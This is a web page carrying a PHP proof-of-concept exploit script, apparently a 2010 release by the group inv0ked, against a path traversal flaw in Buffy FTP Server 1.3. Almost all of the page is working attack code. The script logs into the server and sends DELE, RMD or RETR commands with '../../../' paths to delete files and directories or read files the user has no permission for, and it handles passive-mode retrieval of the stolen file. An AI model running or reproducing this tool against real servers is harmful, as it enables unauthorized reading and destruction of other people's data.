扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 | <?php # _ ___________ #(_)____ _ __/ __ \/ /_________/ /_/_/ | # / // __ \ | / / / / / //_/ _ \/ __// / / / #/ // / / / |/ / /_/ / ,< /__/ /_/ // / / / # /_//_/ /_/|___/\____/_/|_|\___/\__,_// /_/_/ # Live by the byte |_/_/ # # Members: # # Pr0T3cT10n # -=M.o.B.=- # TheLeader # Sro # Debug # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # The following is a proof of concept for a path traversal vulnerability that exists in Buffy FTP Server. # The vulnerability allows an unprivileged attacker to read files and delete files & folders whom he has no permissions to. # The vulnerable FTP commands are: # * RETR - Read File # * RMD - Remove Directory # * DELE - Delete File #----------------------------------- # Exploit Title: Buffy v1.3 Remote Directory Traversal Exploit # Date: 31/10/2010 # Author: Pr0T3cT10n # Software Link: http://www.smotricz.com/opensource/buffy/Buffy.zip # Affected Version: 1.3 # Tested on Windows XP Hebrew, Service Pack 3 # ISRAEL, NULLBYTE.ORG.IL error_reporting(E_ALL); if(count($argv) <= 4) { echo("\r\n# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]\r\n"); echo("\tHOST - An host using Buffy FTP Server\r\n"); echo("\tPORT - Default is 21\r\n"); echo("\tUSER - Username\r\n"); echo("\tPASS - Password\r\n"); exit("\r\n"); } else { $CMD = ''; $CFG = Array('file' => $argv[0], 'host' => $argv[1], 'port' => $argv[2], 'user' => $argv[3], 'pass' => $argv[4]); $sock = fsockopen($CFG['host'], $CFG['port'], $errno, $errstr, 5); if($sock) { echo("(+) Connected to the FTP server at '{$CFG['host']}' on port {$CFG['port']}\r\n"); $read = fread($sock, 1024); fwrite($sock, "USER {$CFG['user']}\r\n"); $read = fread($sock, 1024); fwrite($sock, "PASS {$CFG['pass']}\r\n"); $read = fread($sock, 1024); echo("(~) What would you like to do?\r\n\t1.Remove File\r\n\t2.Remove Directory\r\n\t3.Read File\r\n"); $CHSE = rtrim(fgets(STDIN)); if($CHSE == 1) { $CMD.= "DELE"; echo("(~) Path to file(for example: ../../../test.txt): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "{$CMD} {$PATH}\r\n"); echo(fread($sock, 1024)); } else { exit("(-) Empty path.\r\n"); } } elseif($CHSE == 2) { $CMD.= "RMD"; echo("(~) Path to directory(for example: ../../../test): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "{$CMD} {$PATH}\r\n"); echo(fread($sock, 1024)); } else { exit("(-) Empty path.\r\n"); } } elseif($CHSE == 3) { $CMD.= "RETR"; echo("(~) Path to file(for example: ../../../test.txt): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "PASV\r\n"); $read = fread($sock, 1024); $xpld = explode(',', $read); $addr_tmp = explode('(', $xpld[0]); $address = "{$addr_tmp[1]}.{$xpld[1]}.{$xpld[2]}.{$xpld[3]}"; $port_tmp = explode(')', $xpld[5]); $newport = ($xpld[4]*256)+$port_tmp[0]; fwrite($sock, "{$CMD} {$PATH}\r\n"); $read = fread($sock, 1024); $socket = fsockopen($address, $newport, $errno, $errstr, 5); if($socket) { echo(fread($socket, 1024)); } } else { exit("(-) Empty path.\r\n"); } } else { exit("(-) You have to choose correctly.\r\n"); } } else { exit("(-) Unable to connect to {$CFG['host']}:{$CFG['port']}\r\n"); } } ?> |
体验盒子
